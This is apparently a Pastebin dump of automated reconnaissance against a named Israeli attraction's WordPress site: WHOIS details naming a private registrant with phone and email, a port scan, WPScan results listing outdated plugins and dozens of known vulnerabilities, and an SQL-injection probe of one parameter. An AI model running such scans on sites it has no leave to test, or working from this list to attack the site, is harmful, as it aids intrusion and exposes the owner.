Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #######################################################################################################################################
- Hostname www.flybox.co.il ISP Unknown
- Continent Unknown Flag
- US
- Country United States Country Code US
- Region Unknown Local time 30 Dec 2017 21:45 CST
- City Unknown Latitude 37.751
- IP Address (IPv6) 2400:cb00:2048:1::681f:4aef Longitude -97.822
- #######################################################################################################################################
- [i] Scanning Site: https://flybox.co.il
- B A S I C I N F O
- ====================
- [+] Site Title: Flybox - אטרקציה במרכז לכל המשפחה והחברים! מנהרת רוח הגיעה לישראל
- [+] IP address: 104.31.74.239
- [+] Web Server: cloudflare
- [+] CMS: WordPress
- [+] Cloudflare: Detected
- [+] Robots File: Found
- -------------[ contents ]----------------
- User-agent: *
- Disallow: /wp-admin/
- Allow: /wp-admin/admin-ajax.php
- -----------[end of contents]-------------
- W H O I S L O O K U P
- ========================
- % The data in the WHOIS database of the .il registry is provided
- % by ISOC-IL for information purposes, and to assist persons in
- % obtaining information about or related to a domain name
- % registration record. ISOC-IL does not guarantee its accuracy.
- % By submitting a WHOIS query, you agree that you will use this
- % Data only for lawful purposes and that, under no circumstances
- % will you use this Data to: (1) allow, enable, or otherwise
- % support the transmission of mass unsolicited, commercial
- % advertising or solicitations via e-mail (spam);
- % or (2) enable high volume, automated, electronic processes that
- % apply to ISOC-IL (or its systems).
- % ISOC-IL reserves the right to modify these terms at any time.
- % By submitting this query, you agree to abide by this policy.
- query: flybox.co.il
- reg-name: flybox
- domain: flybox.co.il
- descr: Ofer Bar
- descr: Kibutz Hulda
- descr: Kibutz Hulda
- descr: 11111
- descr: Israel
- phone: +972 54 3035371
- fax-no: +972 9 9574370
- admin-c: IS-OB5539-IL
- tech-c: IS-ID1078-IL
- zone-c: IS-ID1078-IL
- nserver: athena.ns.cloudflare.com
- nserver: vin.ns.cloudflare.com
- validity: 04-09-2019
- DNSSEC: unsigned
- status: Transfer Locked
- changed: domain-registrar AT isoc.org.il 20130904 (Assigned)
- changed: domain-registrar AT isoc.org.il 20161012 (Changed)
- person: Ofer Bar
- address: Ofer Bar
- address: Kibutz Hulda
- address: Kibutz Hulda
- address: 11111
- address: Israel
- phone: +972 54 3035371
- fax-no: +972 9 9574370
- e-mail: tsahye AT gmail.com
- nic-hdl: IS-OB5539-IL
- changed: domain-registrar AT isoc.org.il 20130904
- changed: Managing Registrar 20150805
- person: Interspace Domreg
- address: Interspace Ltd.
- address: P.O.Box 8723
- address: Netanya
- address: 42505
- address: Israel
- phone: +972 73 2224444
- fax-no: +972 73 2224440
- e-mail: domreg AT interspace.net
- nic-hdl: IS-ID1078-IL
- changed: Managing Registrar 20070110
- changed: Managing Registrar 20070319
- changed: Managing Registrar 20070909
- changed: Managing Registrar 20090514
- changed: Managing Registrar 20110720
- changed: Managing Registrar 20110720
- changed: Managing Registrar 20110721
- changed: Managing Registrar 20111128
- changed: Managing Registrar 20111128
- changed: Managing Registrar 20130924
- changed: Managing Registrar 20130924
- changed: Managing Registrar 20130924
- changed: Managing Registrar 20130924
- changed: Managing Registrar 20130924
- changed: Managing Registrar 20170518
- changed: Managing Registrar 20170716
- registrar name: InterSpace Ltd
- registrar info: http://www.internic.co.il
- % Rights to the data above are restricted by copyright.
- G E O I P L O O K U P
- =========================
- [i] IP Address: 104.31.74.239
- [i] Country: US
- [i] State: N/A
- [i] City: N/A
- [i] Latitude: 37.750999
- [i] Longitude: -97.821999
- H T T P H E A D E R S
- =======================
- [i] HTTP/1.1 301 Moved Permanently
- [i] Date: Sun, 31 Dec 2017 03:49:43 GMT
- [i] Content-Type: text/html; charset=UTF-8
- [i] Connection: close
- [i] Set-Cookie: __cfduid=d048dd8f728aacac5c57377105f435c341514692182; expires=Mon, 31-Dec-18 03:49:42 GMT; path=/; domain=.flybox.co.il; HttpOnly
- [i] X-Powered-By: PHP/7.0.13
- [i] Set-Cookie: PHPSESSID=n8skqve9rvv5lcm3rj6i9l9bk6; expires=Thu, 14-Sep-2023 11:45:31 GMT; Max-Age=180000000; path=/
- [i] Expires: Thu, 19 Nov 1981 08:52:00 GMT
- [i] Cache-Control: no-store, no-cache, must-revalidate
- [i] Pragma: no-cache
- [i] Set-Cookie: qtrans_front_language=he; expires=Mon, 31-Dec-2018 03:45:31 GMT; Max-Age=31536000; path=/
- [i] Location: https://www.flybox.co.il/
- [i] Server: cloudflare
- [i] CF-RAY: 3d5a453b3ea599e6-EWR
- [i] HTTP/1.1 200 OK
- [i] Date: Sun, 31 Dec 2017 03:49:44 GMT
- [i] Content-Type: text/html; charset=UTF-8
- [i] Connection: close
- [i] Set-Cookie: __cfduid=dfb1c034c6d2f841166e7b2bc0c56bd481514692183; expires=Mon, 31-Dec-18 03:49:43 GMT; path=/; domain=.flybox.co.il; HttpOnly
- [i] X-Powered-By: PHP/7.0.13
- [i] Set-Cookie: PHPSESSID=68gdntsnihgeglnt961kd9mjd3; expires=Thu, 14-Sep-2023 11:45:32 GMT; Max-Age=180000000; path=/
- [i] Expires: Thu, 19 Nov 1981 08:52:00 GMT
- [i] Cache-Control: no-store, no-cache, must-revalidate
- [i] Pragma: no-cache
- [i] Set-Cookie: qtrans_front_language=he; expires=Mon, 31-Dec-2018 03:45:32 GMT; Max-Age=31536000; path=/
- [i] Link: <https://www.flybox.co.il/wp-json/>; rel="https://api.w.org/"
- [i] Link: <https://www.flybox.co.il/>; rel=shortlink
- [i] Access-Control-Allow-Origin: *
- [i] Server: cloudflare
- [i] CF-RAY: 3d5a45419c650ef7-EWR
- D N S L O O K U P
- ===================
- flybox.co.il. 3788 IN HINFO "ANY obsoleted" "See draft-ietf-dnsop-refuse-any"
- S U B N E T C A L C U L A T I O N
- ====================================
- Address = 2400:cb00:2048:1::681f:4aef
- Network = 2400:cb00:2048:1::681f:4aef / 128
- Netmask = ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
- Wildcard Mask = ::
- Hosts Bits = 0
- Max. Hosts = 0 (2^0 - 1)
- Host Range = { 2400:cb00:2048:1::681f:4af0 - 2400:cb00:2048:1::681f:4aef }
- N M A P P O R T S C A N
- ============================
- Starting Nmap 7.01 ( https://nmap.org ) at 2017-12-31 03:49 UTC
- Nmap scan report for flybox.co.il (104.31.75.239)
- Host is up (0.0021s latency).
- Other addresses for flybox.co.il (not scanned): 104.31.74.239 2400:cb00:2048:1::681f:4aef 2400:cb00:2048:1::681f:4bef
- PORT STATE SERVICE VERSION
- 21/tcp filtered ftp
- 22/tcp filtered ssh
- 23/tcp filtered telnet
- 25/tcp filtered smtp
- 80/tcp open http Cloudflare nginx
- 110/tcp filtered pop3
- 143/tcp filtered imap
- 443/tcp open ssl/http Cloudflare nginx
- 445/tcp filtered microsoft-ds
- 3389/tcp filtered ms-wbt-server
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 13.96 seconds
- [!] IP Address : 104.31.75.239
- [-] Cloudflare detected
- [!] Powered By: PHP/7.0.13
- [-] Clickjacking protection is not in place.
- [!] CMS Detected : WordPress
- [?] Would you like to use WPScan? [Y/n] Y
- _______________________________________________________________
- __ _______ _____
- \ \ / / __ \ / ____|
- \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
- \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
- \ /\ / | | ____) | (__| (_| | | | |
- \/ \/ |_| |_____/ \___|\__,_|_| |_|
- WordPress Security Scanner by the WPScan Team
- Version 2.9.3
- Sponsored by Sucuri - https://sucuri.net
- @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
- _______________________________________________________________
- [i] The remote host tried to redirect to: https://www.flybox.co.il/
- [?] Do you want follow the redirection ? [Y]es [N]o [A]bort, default: [N]Y
- [+] URL: https://www.flybox.co.il/
- [+] Started: Sat Dec 30 22:51:59 2017
- [+] robots.txt available under: 'https://www.flybox.co.il/robots.txt'
- [+] Interesting entry from robots.txt: https://www.flybox.co.il/wp-admin/admin-ajax.php
- [!] The WordPress 'https://www.flybox.co.il/readme.html' file exists exposing a version number
- [+] Interesting header: CF-RAY: 3d5a48eaac52473a-EWR
- [+] Interesting header: LINK: <https://www.flybox.co.il/wp-json/>; rel="https://api.w.org/"
- [+] Interesting header: LINK: <https://www.flybox.co.il/>; rel=shortlink
- [+] Interesting header: SERVER: cloudflare
- [+] Interesting header: SET-COOKIE: qtrans_front_language=he; expires=Mon, 31-Dec-2018 03:48:01 GMT; Max-Age=31536000; path=/
- [+] Interesting header: X-POWERED-BY: PHP/7.0.13
- [+] XML-RPC Interface available under: https://www.flybox.co.il/xmlrpc.php
- [+] WordPress version 4.5.6 (Released on 2017-01-26) identified from meta generator, links opml, stylesheets numbers
- [!] 22 vulnerabilities identified from the version number
- [!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
- Reference: https://wpvulndb.com/vulnerabilities/8765
- Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
- Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
- Reference: http://seclists.org/oss-sec/2017/q1/563
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
- [i] Fixed in: 4.5.7
- [!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
- Reference: https://wpvulndb.com/vulnerabilities/8766
- Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
- [i] Fixed in: 4.5.7
- [!] Title: WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
- Reference: https://wpvulndb.com/vulnerabilities/8768
- Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
- Reference: https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6817
- [i] Fixed in: 4.5.7
- [!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
- Reference: https://wpvulndb.com/vulnerabilities/8770
- Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
- Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
- Reference: http://seclists.org/oss-sec/2017/q1/562
- Reference: https://hackerone.com/reports/153093
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
- [i] Fixed in: 4.5.7
- [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
- Reference: https://wpvulndb.com/vulnerabilities/8807
- Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
- Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
- Reference: https://core.trac.wordpress.org/ticket/25239
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
- [!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
- Reference: https://wpvulndb.com/vulnerabilities/8815
- Reference: https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
- Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
- [i] Fixed in: 4.5.9
- [!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
- Reference: https://wpvulndb.com/vulnerabilities/8816
- Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- Reference: https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062
- [i] Fixed in: 4.5.9
- [!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks
- Reference: https://wpvulndb.com/vulnerabilities/8817
- Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- Reference: https://github.com/WordPress/WordPress/commit/e88a48a066ab2200ce3091b131d43e2fab2460a4
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9065
- [i] Fixed in: 4.5.9
- [!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
- Reference: https://wpvulndb.com/vulnerabilities/8818
- Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- Reference: https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
- Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9064
- [i] Fixed in: 4.5.9
- [!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
- Reference: https://wpvulndb.com/vulnerabilities/8819
- Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- Reference: https://github.com/WordPress/WordPress/commit/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6
- Reference: https://hackerone.com/reports/203515
- Reference: https://hackerone.com/reports/203515
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9061
- [i] Fixed in: 4.5.9
- [!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
- Reference: https://wpvulndb.com/vulnerabilities/8820
- Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- Reference: https://github.com/WordPress/WordPress/commit/3d10fef22d788f29aed745b0f5ff6f6baea69af3
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9063
- [i] Fixed in: 4.5.9
- [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
- Reference: https://wpvulndb.com/vulnerabilities/8905
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
- Reference: https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
- [i] Fixed in: 4.5.10
- [!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
- Reference: https://wpvulndb.com/vulnerabilities/8906
- Reference: https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
- Reference: https://wpvulndb.com/vulnerabilities/8905
- [i] Fixed in: 4.7.5
- [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
- Reference: https://wpvulndb.com/vulnerabilities/8910
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/changeset/41398
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
- [i] Fixed in: 4.5.10
- [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
- Reference: https://wpvulndb.com/vulnerabilities/8911
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/changeset/41457
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
- [i] Fixed in: 4.5.10
- [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
- Reference: https://wpvulndb.com/vulnerabilities/8913
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/changeset/41448
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
- [i] Fixed in: 4.5.10
- [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
- Reference: https://wpvulndb.com/vulnerabilities/8914
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/changeset/41395
- Reference: https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
- [i] Fixed in: 4.5.10
- [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
- Reference: https://wpvulndb.com/vulnerabilities/8941
- Reference: https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
- Reference: https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
- Reference: https://twitter.com/ircmaxell/status/923662170092638208
- Reference: https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
- [i] Fixed in: 4.5.11
- [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
- Reference: https://wpvulndb.com/vulnerabilities/8966
- Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
- [i] Fixed in: 4.5.12
- [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
- Reference: https://wpvulndb.com/vulnerabilities/8967
- Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
- [i] Fixed in: 4.5.12
- [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
- Reference: https://wpvulndb.com/vulnerabilities/8968
- Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
- [i] Fixed in: 4.5.12
- [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
- Reference: https://wpvulndb.com/vulnerabilities/8969
- Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
- [i] Fixed in: 4.5.12
- [+] WordPress theme in use: blue-summit-wp-bootstrap - v1.0
- [+] Name: blue-summit-wp-bootstrap - v1.0
- | Location: https://www.flybox.co.il/wp-content/themes/blue-summit-wp-bootstrap/
- | Style URL: https://www.flybox.co.il/wp-content/themes/blue-summit-wp-bootstrap/style.css
- | Theme Name: Flybox
- | Author: Flybox
- | Author URI: http://www.flybox.co.il/
- [+] Enumerating plugins from passive detection ...
- | 15 plugins found:
- [+] Name: accordions - v2.0.8
- | Last updated: 2017-11-26T04:13:00.000Z
- | Location: https://www.flybox.co.il/wp-content/plugins/accordions/
- | Readme: https://www.flybox.co.il/wp-content/plugins/accordions/readme.txt
- [!] The version is out of date, the latest version is 2.0.21
- [+] Name: colorbox - v1.0.0
- | Last updated: 2016-12-15T12:02:00.000Z
- | Location: https://www.flybox.co.il/wp-content/plugins/colorbox/
- | Readme: https://www.flybox.co.il/wp-content/plugins/colorbox/readme.txt
- [!] The version is out of date, the latest version is 1.0.5
- [+] Name: front-end-only-users - v2.9.13
- | Last updated: 2017-12-15T23:06:00.000Z
- | Location: https://www.flybox.co.il/wp-content/plugins/front-end-only-users/
- | Readme: https://www.flybox.co.il/wp-content/plugins/front-end-only-users/readme.txt
- [!] The version is out of date, the latest version is 3.1.15
- [+] Name: new-royalslider
- | Location: https://www.flybox.co.il/wp-content/plugins/new-royalslider/
- [+] Name: popup-builder - v2.3.1
- | Last updated: 2017-12-27T14:41:00.000Z
- | Location: https://www.flybox.co.il/wp-content/plugins/popup-builder/
- | Readme: https://www.flybox.co.il/wp-content/plugins/popup-builder/readme.txt
- [!] The version is out of date, the latest version is 2.6.7.1
- [+] Name: popup-maker - v1.4.20
- | Last updated: 2017-08-18T00:49:00.000Z
- | Location: https://www.flybox.co.il/wp-content/plugins/popup-maker/
- | Readme: https://www.flybox.co.il/wp-content/plugins/popup-maker/readme.txt
- [!] The version is out of date, the latest version is 1.6.6
- [!] Title: Popup Maker <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
- Reference: https://wpvulndb.com/vulnerabilities/8878
- Reference: https://plugins.trac.wordpress.org/changeset/1697216/#file3
- Reference: https://jvn.jp/en/jp/JVN92921024/index.html
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2284
- [i] Fixed in: 1.6.5
- [+] Name: qtranslate-x - v3.4.6.8
- | Latest version: 3.4.6.8 (up to date)
- | Last updated: 2016-07-13T17:36:00.000Z
- | Location: https://www.flybox.co.il/wp-content/plugins/qtranslate-x/
- | Readme: https://www.flybox.co.il/wp-content/plugins/qtranslate-x/readme.txt
- [+] Name: social-popup - v1.8
- | Latest version: 1.6.4.5 (up to date)
- | Last updated: 2015-05-20T17:06:00.000Z
- | Location: https://www.flybox.co.il/wp-content/plugins/social-popup/
- | Readme: https://www.flybox.co.il/wp-content/plugins/social-popup/README.txt
- [+] Name: sogo-accessibility - v1.0.9
- | Last updated: 2017-11-09T06:07:00.000Z
- | Location: https://www.flybox.co.il/wp-content/plugins/sogo-accessibility/
- | Readme: https://www.flybox.co.il/wp-content/plugins/sogo-accessibility/README.txt
- [!] The version is out of date, the latest version is 1.2.2
- [+] Name: superfly-menu
- | Location: https://www.flybox.co.il/wp-content/plugins/superfly-menu/
- [+] Name: woocommerce - v2.5.5
- | Last updated: 2017-12-13T16:24:00.000Z
- | Location: https://www.flybox.co.il/wp-content/plugins/woocommerce/
- | Readme: https://www.flybox.co.il/wp-content/plugins/woocommerce/readme.txt
- [!] The version is out of date, the latest version is 3.2.6
- [!] Title: WooCommerce <= 2.6.2 - Authenticated Cross-Site Scripting (XSS)
- Reference: https://wpvulndb.com/vulnerabilities/8563
- Reference: https://woocommerce.wordpress.com/2016/07/19/woocommerce-2-6-3-fixsecurity-release-notes/
- Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_woocommerce_using_image_metadata__exif_.html
- [i] Fixed in: 2.6.3
- [!] Title: WooCommerce <= 2.6.3 - Stored Cross Site Scripting (XSS) via REST API
- Reference: https://wpvulndb.com/vulnerabilities/8619
- Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_woocommerce_wordpress_plugin.html
- Reference: http://seclists.org/fulldisclosure/2016/Sep/20
- Reference: https://hackerone.com/reports/152692
- [i] Fixed in: 2.6.4
- [!] Title: WooCommerce <= 2.6.8 - Authenticated Tax-Rate CSV XSS
- Reference: https://wpvulndb.com/vulnerabilities/8710
- Reference: https://www.fortiguard.com/advisory/fortinet-discovers-wordpress-woocommerce-plug-in-cross-site-scripting-vulnerability-1
- Reference: http://blog.fortinet.com/2016/12/16/woocommerce-tax-rates-cross-site-scripting-vulnerability2
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10112
- [i] Fixed in: 2.6.9
- [+] Name: woocommerce-ajax-add-to-cart-for-variable-products - v1.2.8
- | Last updated: 2016-07-18T20:56:00.000Z
- | Location: https://www.flybox.co.il/wp-content/plugins/woocommerce-ajax-add-to-cart-for-variable-products/
- | Readme: https://www.flybox.co.il/wp-content/plugins/woocommerce-ajax-add-to-cart-for-variable-products/readme.txt
- [!] The version is out of date, the latest version is 1.2.9
- [+] Name: woocommerce-bookings
- | Location: https://www.flybox.co.il/wp-content/plugins/woocommerce-bookings/
- | Changelog: https://www.flybox.co.il/wp-content/plugins/woocommerce-bookings/changelog.txt
- [+] Name: wp-facebook-login - v1.1.2
- | Last updated: 2017-12-21T21:28:00.000Z
- | Location: https://www.flybox.co.il/wp-content/plugins/wp-facebook-login/
- | Readme: https://www.flybox.co.il/wp-content/plugins/wp-facebook-login/README.txt
- [!] The version is out of date, the latest version is 1.2.2
- [+] Name: wordpress-seo - v3.2.5
- | Last updated: 2017-12-20T08:23:00.000Z
- | Location: https://www.flybox.co.il/wp-content/plugins/wordpress-seo/
- | Readme: https://www.flybox.co.il/wp-content/plugins/wordpress-seo/readme.txt
- | Changelog: https://www.flybox.co.il/wp-content/plugins/wordpress-seo/changelog.txt
- [!] The version is out of date, the latest version is 6.0
- [!] Title: Yoast SEO <= 3.2.5 - Unspecified Cross-Site Scripting (XSS)
- Reference: https://wpvulndb.com/vulnerabilities/8569
- Reference: https://wordpress.org/plugins/wordpress-seo/changelog/
- [i] Fixed in: 3.3.0
- [!] Title: Yoast SEO <= 3.4.0 - Authenticated Stored Cross-Site Scripting (XSS)
- Reference: https://wpvulndb.com/vulnerabilities/8583
- Reference: https://plugins.trac.wordpress.org/changeset/1466243/wordpress-seo
- [i] Fixed in: 3.4.1
- [!] Title: Yoast SEO <= 5.7.1 - Unauthenticated Cross-Site Scripting (XSS)
- Reference: https://wpvulndb.com/vulnerabilities/8960
- Reference: https://plugins.trac.wordpress.org/changeset/1766831/wordpress-seo/trunk/admin/google_search_console/class-gsc-table.php
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16842
- [i] Fixed in: 5.8
- [+] Finished: Sat Dec 30 22:59:22 2017
- [+] Requests Done: 432
- [+] Memory used: 203.512 MB
- [+] Elapsed time: 00:07:22
- [+] Honeypot Probabilty: 30%
- ----------------------------------------
- [+] Robots.txt retrieved
- User-agent: *
- Disallow: /wp-admin/
- Allow: /wp-admin/admin-ajax.php
- ----------------------------------------
- PORT STATE SERVICE VERSION
- 21/tcp filtered ftp
- 22/tcp filtered ssh
- 23/tcp filtered telnet
- 25/tcp filtered smtp
- 80/tcp open http Cloudflare nginx
- 110/tcp filtered pop3
- 143/tcp filtered imap
- 443/tcp open ssl/https?
- 445/tcp filtered microsoft-ds
- 3389/tcp filtered ms-wbt-server
- ----------------------------------------
- [+] DNS Records
- [+] Host Records (A)
- www.flybox.co.ilHTTP: (104.31.75.239) AS13335 Cloudflare Inc
- [+] TXT Records
- [+] DNS Map: https://dnsdumpster.com/static/map/www.flybox.co.il.png
- [>] Initiating 3 intel modules
- [>] Loading Alpha module (1/3)
- [>] Beta module deployed (2/3)
- [>] Gamma module initiated (3/3)
- No emails found
- [+] Hosts found in search engines:
- ------------------------------------
- [-] Resolving hostnames IPs...
- [+] Virtual hosts:
- -----------------
- [>] Crawling the target for fuzzable URLs
- [+] Found 4 fuzzable URLs
- https://www.flybox.co.il///selected-package/?packageid=1
- [>] Using SQLMap api to check for SQL injection vulnerabilities. Don't
- worry we are using an online service and it doesn't depend on your internet connection.
- This scan will take 2-3 minutes.
- [-] None of parameters is vulnerable to SQL injection
- [+] These are the URLs having parameters:
- https://www.flybox.co.il///selected-package/?packageid=1
- https://www.flybox.co.il///selected-package/?packageid=1
- https://www.flybox.co.il///selected-package/?packageid=1
- https://www.flybox.co.il///selected-package/?packageid=1
- +] Target: https://www.flybox.co.il/
- [+] Starting: 30/12/2017 22:55:35
- [+] Server: cloudflare
- [+] Uncommon header "Access-Control-Allow-Origin" found, with contents: *
- [+] Uncommon header "CF-RAY" found, with contents: 3d5a4dde08fb0efd-EWR
- [+] XML-RPC Interface available under: https://www.flybox.co.il/xmlrpc.php
- [+] Found robots.txt file under: https://www.flybox.co.il/robots.txt
- [+] Found wp-config.php file under: https://www.flybox.co.il/wp-config.php
- [+] Found readme.html file under: https://www.flybox.co.il/readme.html
- [+] wp-login not detect protection under: https://www.flybox.co.il/wp-login.php
- [+] Robots available under: https://www.flybox.co.il/robots.txt
- -------------------------
- User-agent: *
- Disallow: /wp-admin/
- Allow: /wp-admin/admin-ajax.php
- -------------------------
- [+] Running WordPress version: 4.5.6
- | Release date: 2017-01-26
- | Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
- | Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
- | Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
- | Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
- | Reference: http://seclists.org/oss-sec/2017/q1/563
- | Fixed in: 4.5.7
- | Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
- | Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
- | Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
- | Fixed in: 4.5.7
- | Title: WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
- | Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
- | Reference: https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
